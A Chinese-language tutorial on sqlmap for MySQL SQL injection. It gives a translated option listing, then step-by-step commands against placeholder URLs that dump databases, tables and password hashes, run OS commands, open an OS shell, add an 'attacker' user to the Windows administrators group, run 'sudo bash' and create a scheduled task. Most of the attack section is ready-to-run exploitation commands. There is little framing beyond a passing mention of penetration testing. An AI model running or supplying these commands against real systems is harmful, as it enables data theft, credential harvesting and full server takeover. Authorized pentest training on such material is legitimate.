SQLMAP注入之MySQL注入总结

简介

sqlmap 是一个开源的自动化 SQL 注入(SQLi)攻击和数据库接管工具，广泛应用于渗透测试、漏洞评估和安全研究。它旨在帮助安全研究人员和渗透测试人员发现和利用 SQL 注入漏洞，进行数据库接管、信息泄露和数据提取等操作。

sqlmap 提供了强大的功能，可以自动化地进行各种 SQL 注入测试，并支持多种数据库管理系统(DBMS)，包括 MySQL、PostgreSQL、Oracle、Microsoft SQL Server、SQLite、MongoDB 等。

功能概述

sqlmap 提供了多种功能，能够执行如下操作：

自动化检测 SQL 注入漏洞：

通过检测并分析目标 URL 中的输入参数，自动识别潜在的 SQL 注入漏洞。

支持基于 GET 和 POST 请求的 SQL 注入检测。

数据库信息枚举：

自动化地枚举目标数据库的结构，包括数据库名、表名、列名等信息。

可以列出所有数据库，查看特定数据库中的表，甚至列出表中的列。

数据提取：

sqlmap 可以从受影响的数据库中提取数据，包括导出表、行和列的数据。

支持导出数据为多种格式，如 CSV、XML、JSON 等。

数据库用户信息提取：

可以提取数据库的用户信息，如数据库用户名、密码哈希、权限等。

数据库和操作系统命令执行：

在成功利用 SQL 注入漏洞的情况下，sqlmap 还可以利用数据库进行操作系统命令的执行(如果数据库账户有足够权限)。

SQL 注入类型支持：

支持多种 SQL 注入类型，如布尔盲注、时间盲注、联合查询注入、堆叠查询注入等。

绕过安全防护：

提供了一些绕过 WAF(Web 应用防火墙)、IDS/IPS(入侵检测系统)等安全防护机制的功能。

数据库接管：

在目标数据库存在高权限漏洞的情况下，sqlmap 可实现对数据库服务器的完整控制，包括命令执行和权限提升。

主要特性

自动化和可配置性：sqlmap 提供丰富的命令行参数，支持自动化测试和多种自定义选项，适应不同的渗透测试需求。

多种数据库支持：sqlmap 支持多种数据库管理系统(DBMS)，包括但不限于 MySQL、PostgreSQL、SQLite、Oracle、MS SQL Server 等。

注入类型识别：sqlmap 可以自动识别多种类型的 SQL 注入漏洞(如布尔盲注、时间盲注、UNION 注入等)，并根据检测到的漏洞类型选择最佳的攻击方式。

数据导出功能：sqlmap 能够从受影响的数据库中导出数据，包括所有表的内容、单个表的内容，甚至是特定列的内容。

操作系统命令执行：如果数据库用户权限足够，sqlmap 可以执行操作系统命令，进一步攻击系统。

使用场景

渗透测试：sqlmap 是渗透测试人员用于评估 Web 应用 SQL 注入漏洞的重要工具，帮助评估数据库和服务器的安全性。

漏洞验证：用于验证 SQL 注入漏洞的存在，并进一步测试漏洞的危害性和利用方式。

数据恢复：在某些情况下，sqlmap 可以帮助从受影响的数据库中恢复数据，特别是在数据库配置不当的情况下。

基本命令

使用方法: sqlmap.py [选项]

选项:

-h, --help 显示基本帮助信息并退出
-hh 显示高级帮助信息并退出
--version 显示程序版本号并退出
-v VERBOSE 设置详细级别：0-6(默认为1)

目标:

至少需要提供以下一个选项来定义目标

-u URL, --url=URL  目标URL(例如："http://www.site.com/vuln.php?id=1")
-d DIRECT          用于直接数据库连接的连接字符串
-l LOGFILE         从Burp或WebScarab代理日志文件解析目标
-m BULKFILE        从文本文件中读取多个目标进行扫描
-r REQUESTFILE     从文件加载HTTP请求
-g GOOGLEDORK      将Google dork结果作为目标URL处理
-c CONFIGFILE      从配置INI文件加载选项

请求:

这些选项可以用来指定如何连接到目标URL

-A AGENT, --user.. HTTP User-Agent头的值
-H HEADER, --hea.. 额外的头部(例如："X-Forwarded-For: 127.0.0.1")
--method=METHOD    强制使用给定的HTTP方法(例如PUT)
--data=DATA        通过POST发送的数据字符串(例如："id=1")
--param-del=PARA.. 用于分割参数值的字符(例如&)
--cookie=COOKIE    HTTP Cookie头部的值(例如："PHPSESSID=a8d127e..")
--cookie-del=COO.. 用于分割Cookie值的字符(例如;)
--live-cookies=L.. 加载最新值的实时Cookies文件
--load-cookies=L.. 包含Netscape/wget格式Cookies的文件
--drop-set-cookie  忽略响应中的Set-Cookie头部
--mobile           通过HTTP User-Agent头部模拟智能手机
--random-agent     使用随机选择的HTTP User-Agent头部值
--host=HOST        HTTP Host头部的值
--referer=REFERER  HTTP Referer头部的值
--headers=HEADERS  额外的头部(例如："Accept-Language: fr\nETag: 123")
--auth-type=AUTH.. HTTP认证类型(Basic, Digest, Bearer等)
--auth-cred=AUTH.. HTTP认证凭据(用户名:密码)
--auth-file=AUTH.. HTTP认证PEM证书/私钥文件
--abort-code=ABO.. 在特定HTTP错误代码时终止(例如401)
--ignore-code=IG.. 忽略特定HTTP错误代码(例如401)
--ignore-proxy     忽略系统默认代理设置
--ignore-redirects 忽略重定向尝试
--ignore-timeouts  忽略连接超时
--proxy=PROXY      使用代理连接到目标URL
--proxy-cred=PRO.. 代理认证凭据(用户名:密码)
--proxy-file=PRO.. 从文件加载代理列表
--proxy-freq=PRO.. 每隔多少次请求更换一次来自给定列表的代理
--tor              使用Tor匿名网络
--tor-port=TORPORT 设置不同于默认的Tor代理端口
--tor-type=TORTYPE 设置Tor代理类型(HTTP, SOCKS4或SOCKS5，默认)
--check-tor        检查是否正确使用了Tor
--delay=DELAY      每个HTTP请求之间的延迟秒数
--timeout=TIMEOUT  连接超时等待秒数(默认30秒)
--retries=RETRIES  当连接超时时重试次数(默认3次)
--retry-on=RETRYON 当内容匹配正则表达式时重试请求(例如"drop")
--randomize=RPARAM 随机更改给定参数的值
--safe-url=SAFEURL 测试期间频繁访问的安全URL地址
--safe-post=SAFE.. 发送到安全URL的POST数据
--safe-req=SAFER.. 从文件加载安全HTTP请求
--safe-freq=SAFE.. 访问安全URL之间定期发送的请求
--skip-urlencode   跳过有效负载数据的URL编码
--csrf-token=CSR.. 用于保存反CSRF令牌的参数
--csrf-url=CSRFURL 提取反CSRF令牌的URL地址
--csrf-method=CS.. 反CSRF令牌页面访问期间使用的HTTP方法
--csrf-data=CSRF.. 反CSRF令牌页面访问期间发送的POST数据
--csrf-retries=C.. 反CSRF令牌检索重试次数(默认0)
--force-ssl        强制使用SSL/HTTPS
--chunked          使用HTTP分块传输编码(POST)请求
--hpp              使用HTTP参数污染方法
--eval=EVALCODE    在请求之前评估提供的Python代码(例如："import hashlib;id2=hashlib.md5(id).hexdigest()")

优化:

这些选项可以用来优化sqlmap的性能

-o                 打开所有优化开关
--predict-output   预测常见查询输出
--keep-alive       使用持久HTTP(s)连接
--null-connection  不实际获取HTTP响应体的情况下获取页面长度
--threads=THREADS  最大并发HTTP(s)请求数量(默认为1)

注入:

这些选项可以用来指定测试哪些参数，提供自定义注入有效负载和可选篡改脚本

-p TESTPARAMETER   可测试的参数
--skip=SKIP        跳过给定参数的测试
--skip-static      跳过看似静态的参数测试
--param-exclude=.. 排除测试参数的正则表达式(例如"ses")
--param-filter=P.. 按位置选择可测试参数(例如"POST")
--dbms=DBMS        强制后端DBMS使用提供的值
--dbms-cred=DBMS.. DBMS认证凭据(用户:密码)
--os=OS            强制后端DBMS操作系统使用提供的值
--invalid-bignum   使用大数字使值无效
--invalid-logical  使用逻辑运算使值无效
--invalid-string   使用随机字符串使值无效
--no-cast          关闭有效负载转换机制
--no-escape        关闭字符串转义机制
--prefix=PREFIX    注入有效负载前缀字符串
--suffix=SUFFIX    注入有效负载后缀字符串
--tamper=TAMPER    使用给定脚本篡改注入数据

检测:

这些选项可以用来定制检测阶段

--level=LEVEL      执行测试的级别(1-5，默认为1)
--risk=RISK        执行测试的风险级别(1-3，默认为1)
--string=STRING    查询评估为真时匹配的字符串
--not-string=NOT.. 查询评估为假时匹配的字符串
--regexp=REGEXP    查询评估为真时匹配的正则表达式
--code=CODE        查询评估为真时匹配的HTTP代码
--smart            如果启发式分析结果为正，则执行彻底测试
--text-only        仅基于文本内容比较页面
--titles           仅基于标题比较页面

技术:

这些选项可以用来调整特定SQL注入技术的测试

--technique=TECH.. 使用的SQL注入技术(默认"BEUSTQ")
--time-sec=TIMESEC 延迟DBMS响应的秒数(默认5秒)
--union-cols=UCOLS 用于测试UNION查询SQL注入的列范围
--union-char=UCHAR 用于暴力破解列数的字符
--union-from=UFROM UNION查询SQL注入中FROM部分使用的表
--union-values=U.. UNION查询SQL注入中使用的列值
--dns-domain=DNS.. 用于DNS渗漏攻击的域名
--second-url=SEC.. 搜索二级响应的结果页面URL
--second-req=SEC.. 从文件加载二级HTTP请求

指纹识别:

-f, --fingerprint  执行广泛的DBMS版本指纹识别

枚举:

这些选项可以用来枚举后端数据库管理系统的信息、结构和表格中包含的数据

-a, --all          获取所有信息
-b, --banner       获取DBMS标识信息
--current-user     获取当前DBMS用户
--current-db       获取当前DBMS数据库
--hostname         获取DBMS服务器主机名
--is-dba           检测当前DBMS用户是否为DBA
--users            枚举DBMS用户
--passwords        枚举DBMS用户的密码哈希
--privileges       枚举DBMS用户的权限
--roles            枚举DBMS用户的角色
--dbs              枚举DBMS数据库
--tables           枚举DBMS数据库表格
--columns          枚举DBMS数据库表格列
--schema           枚举DBMS模式
--count            获取表格的条目数量
--dump             导出DBMS数据库表格条目
--dump-all         导出所有DBMS数据库表格条目
--search           搜索列、表和/或数据库名称
--comments         枚举过程中检查DBMS注释
--statements       获取在DBMS上运行的SQL语句
-D DB              枚举的DBMS数据库
-T TBL             枚举的DBMS数据库表
-C COL             枚举的DBMS数据库表格列
-X EXCLUDE         不枚举的DBMS数据库标识符
-U USER            枚举的DBMS用户
--exclude-sysdbs   枚举表格时排除DBMS系统数据库
--pivot-column=P.. 枢纽列名称
--where=DUMPWHERE  表格导出时使用WHERE条件
--start=LIMITSTART 获取的第一个导出表格条目
--stop=LIMITSTOP   获取的最后一个导出表格条目
--first=FIRSTCHAR  获取查询输出单词的第一个字符
--last=LASTCHAR    获取查询输出单词的最后一个字符
--sql-query=SQLQ.. 要执行的SQL语句
--sql-shell        提示进入交互式SQL shell
--sql-file=SQLFILE 执行来自给定文件的SQL语句

穷举:

这些选项可以用来运行穷举检查

--common-tables    检查常见表的存在
--common-columns   检查常见列的存在
--common-tables    检查常见表是否存在
--common-columns   检查常见列是否存在
--common-files     检查常见文件是否存在

用户自定义函数注入:

这些选项可以用来创建自定义用户定义的函数

--udf-inject       注入自定义用户定义的函数
--shared-lib=SHLIB 共享库的本地路径

文件系统访问:

这些选项可以用来访问后端数据库管理系统底层的文件系统

--file-read=FILE.. 从后端DBMS文件系统读取文件
--file-write=FIL.. 在后端DBMS文件系统上写入本地文件
--file-dest=FILE.. 写入到后端DBMS文件系统的绝对路径

操作系统访问:

这些选项可以用来访问后端数据库管理系统底层的操作系统

--os-cmd=OSCMD     执行操作系统命令
--os-shell         提示进入交互式操作系统shell
--os-pwn           提示获取带外(OOB)shell、Meterpreter或VNC
--os-smbrelay      单击提示获取带外(OOB)shell、Meterpreter或VNC
--os-bof           存储过程缓冲区溢出利用
--priv-esc         数据库进程用户权限提升
--msf-path=MSFPATH Metasploit Framework安装的本地路径
--tmp-path=TMPPATH 远程临时文件目录的绝对路径

Windows 注册表访问:

这些选项可以用来访问后端数据库管理系统的Windows注册表

--reg-read         读取Windows注册表键值
--reg-add          写入Windows注册表键值数据
--reg-del          删除Windows注册表键值
--reg-key=REGKEY   Windows注册表键
--reg-value=REGVAL Windows注册表键值
--reg-data=REGDATA Windows注册表键值数据
--reg-type=REGTYPE Windows注册表键值类型

常规:

这些选项可以用来设置一些通用的工作参数

-s SESSIONFILE     从存储的(.sqlite)文件加载会话
-t TRAFFICFILE     将所有HTTP流量记录到文本文件中
--abort-on-empty   在结果为空时终止数据检索
--answers=ANSWERS  设置预定义的答案(例如"quit=N,follow=N")
--base64=BASE64P.. 包含Base64编码数据的参数
--base64-safe      使用URL和文件名安全的Base64字母表(RFC 4648)
--batch            从不询问用户输入，使用默认行为
--binary-fields=.. 结果字段具有二进制值(例如"digest")
--check-internet   在评估目标之前检查互联网连接
--cleanup          清理sqlmap特定的UDF和表格以清除DBMS
--crawl=CRAWLDEPTH 从目标URL开始爬取网站
--crawl-exclude=.. 排除页面爬取的正则表达式(例如"logout")
--csv-del=CSVDEL   CSV输出中使用的分隔字符(默认",")
--charset=CHARSET  盲注SQL注入字符集(例如"0123456789abcdef")
--dump-file=DUMP.. 将转储的数据存储到自定义文件
--dump-format=DU.. 转储数据格式(CSV(默认)、HTML或SQLITE)
--encoding=ENCOD.. 数据检索中使用的字符编码(例如GBK)
--eta              显示每个输出的预计到达时间
--flush-session    刷新当前目标的会话文件
--forms            解析并测试目标URL上的表单
--fresh-queries    忽略会话文件中存储的查询结果
--gpage=GOOGLEPAGE 使用来自指定页码的Google dork结果
--har=HARFILE      将所有HTTP流量记录到HAR文件中
--hex              在数据检索期间使用十六进制转换
--output-dir=OUT.. 自定义输出目录路径
--parse-errors     解析并显示响应中的DBMS错误消息
--preprocess=PRE.. 使用给定脚本进行预处理(请求)
--postprocess=PO.. 使用给定脚本进行后处理(响应)
--repair           重新转储带有未知字符标记(？)的条目
--save=SAVECONFIG  将选项保存到配置INI文件
--scope=SCOPE      用于过滤目标的正则表达式
--skip-heuristics  跳过漏洞的启发式检测
--skip-waf         跳过WAF/IPS保护的启发式检测
--table-prefix=T.. 临时表使用的前缀(默认："sqlmap")
--test-filter=TE.. 根据有效负载和/或标题选择测试(例如ROW)
--test-skip=TEST.. 根据有效负载和/或标题跳过测试(例如BENCHMARK)
--time-limit=TIM.. 以秒为单位的时间限制运行(例如3600)
--unsafe-naming    禁用DBMS标识符的转义(例如"user")
--web-root=WEBROOT Web服务器文档根目录(例如"/var/www")

其他:

这些选项不属于任何其他类别

-z MNEMONICS       使用简短助记符(例如"flu,bat,ban,tec=EU")
--alert=ALERT      当发现SQL注入时运行主机OS命令
--beep             在问题和/或发现漏洞时发出蜂鸣声
--dependencies     检查缺失的(可选)sqlmap依赖项
--disable-coloring 禁用控制台输出着色
--disable-hashing  禁用表转储时的哈希分析
--list-tampers     显示可用篡改脚本列表
--no-logging       禁用日志记录到文件
--offline          离线模式工作(仅使用会话数据)
--purge            安全地移除sqlmap数据目录中的所有内容
--results-file=R.. 多个目标模式下CSV结果文件的位置
--shell            提示进入交互式sqlmap shell
--tmp-dir=TMPDIR   用于存储临时文件的本地目录
--unstable         调整不稳定连接的选项
--update           更新sqlmap
--wizard           面向初学者用户的简单向导界面

MySQL 数据库利用

1.3.1MySQL数据库漏洞利用及数据导出

1、确认目标是否存在 SQL 注入漏洞

sqlmap -u "http://example.com/page?id=1"--batch --dbs

-u：指定 URL，注入点。

--batch：自动回答所有提示(适合批处理模式)。

--dbs：列出数据库的名称。

如果该 URL 存在 SQL 注入漏洞，sqlmap 会列出目标数据库中的所有数据库。

2、列出数据库中的表

sqlmap -u "http://example.com/page?id=1"--batch -D database_name --tables

-D：指定要查看表的数据库名称。

--tables：列出指定数据库中的所有表。

3、查看表列名

可以通过--schema获取该数据库的所有列名或者某个数据库表的列名--columns

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name --columns

sqlmap -u "http://example.com/page?id=1"--batch -D database_name --columns

sqlmap -u "http://example.com/page?id=1"--batch -D database_name --schema

4、导出数据

当知道了表结构之后，可以使用 sqlmap 导出表中的数据。可以选择导出所有数据或按条件导出特定数据。

(1)导出整个表的内容

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name --dump

--dump：导出指定表中的所有数据。

(2)导出特定列的数据(可选)

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name -C "column1,column2" --dump

-C：指定要导出的列(以逗号分隔)。

(3)将数据导出到文件

默认情况下，sqlmap 会将导出的数据保存到 output 目录中的文件。可以指定输出目录或文件名，使用 --output-dir 选项：

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name --dump --output-dir="/path/to/directory"

5、使用其他选项优化导出过程

指定数据格式：可以指定导出的数据格式为 CSV 或 XML 格式。使用 --csv 或 --xml 参数来改变输出格式。

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name --dump --csv

过滤数据：如果不想导出整个表的数据，可以通过 --where 选项添加条件，过滤要导出的数据。

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name --dump --where="id > 1000"

6、分批次导出

如果数据表非常大，导出过程可能会比较长，这时你可以选择分批导出，或者利用 --start 和 --stop 参数进行分页导出。

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name --dump --start=0 --stop=100

--start：指定从哪一行开始导出数据。

--stop：指定导出多少行数据。

7、快速导出

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name --dump --where "id >1 and id<10000"

sqlmap -u "http://example.com/page?id=1"--batch -D database_name -T table_name --dump --where "id between 1 and 10000"

8、批量导出多个表格的数据

sqlmap还支持批量导出多个表格的数据，可以通过一次性指定多个表格。例如：

sqlmap -u "http://example.com/vulnerable.php?id=1"-D mydatabase -T users,orders,products --dump

这将导出 mydatabase 数据库中 users、orders 和 products 表格的所有数据。

9、使用其他高级选项

(1)并发线程

sqlmap还提供了许多高级选项，可以根据需要进行配置。例如，可以使用 --threads 参数指定并发线程数，以加快数据导出速度：

sqlmap -u "http://example.com/vulnerable.php?id=1"-D mydatabase -T users --dump --threads=5

这将使用5个并发线程进行数据导出。

(2)导出数据时的错误处理

在导出数据过程中，可能会遇到各种错误。例如，网络中断、服务器防火墙限制等。可以使用 --retries 参数指定重试次数，以提高数据导出的成功率：

sqlmap -u "http://example.com/vulnerable.php?id=1"-D mydatabase -T users --dump --retries=3

这将尝试3次重试，以应对临时性的网络问题。

(3)复杂情况下的导出

python sqlmap.py -r t.txt --technique=U --union-cols=11 --union-char=X --dbms=mysql --tamper=custmo --suffix=# -D t --batch --dump -T tz --where="id>0" --random-agent

(4)MySQL数据库用户及密码获取

sqlmap -u "http://example.com/page?id=1"--batch --users --passwords

1.3.2MySQL 提权

1、测试是否可以执行操作系统命令

通过 sqlmap 可以测试目标是否能够执行系统命令。执行以下命令，测试是否可以执行操作系统命令：

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "whoami"

--os-cmd：执行操作系统命令(Linux 和 Windows 环境都适用)。

如果命令成功返回，说明数据库账户有执行系统命令的权限，进一步提权变得可能。

2、提权操作

一旦确定可以执行操作系统命令，可以尝试通过 SQL 注入利用数据库账户执行更高权限的命令(例如，创建新的管理员用户、提权等)。

(1)Linux 提权：可以尝试执行以下命令：

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "id"

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "whoami"

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "sudo whoami" # 如果数据库用户有 sudo 权限

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "touch /tmp/evil_file" # 创建恶意文件

(2)Windows 提权

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "whoami"

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "dir C:\Windows\System32"

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "net user" # 列出 Windows 用户

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "net localgroup administrators" # 列出管理员组成员

(3)提升为管理员权限

如果数据库用户有足够权限，可以尝试提升自己的权限。例如，在 Linux 上可以通过以下命令来获取 root 权限：

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "sudo bash"

在 Windows 上，如果数据库用户有足够权限，可能会执行以下命令来获得管理员权限：

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "net user attacker YourPassword /add"

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "net localgroup administrators attacker /add"

3、上传 Web Shell

如果数据库支持文件存储(例如文件路径在数据库中)，可以通过 SQL 注入上传 Web shell，并通过 Web shell 进行操作系统级别的提权：

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-shell

这将启动一个交互式 shell，使你能够与操作系统直接交互并执行命令。

4、针对 Windows 环境的具体提权技巧

利用 Windows 的计划任务：如果 SQL 注入用户有权限添加计划任务，可以通过以下方式创建一个新任务，该任务运行一个恶意脚本或可执行文件。

python sqlmap.py -u "http://target.com/vulnerable_page?id=1"--os-cmd "schtasks /create /sc once /tn 'attacker_task' /tr 'cmd.exe /c echo hello > C:\Windows\Temp\attack.txt' /st 00:00"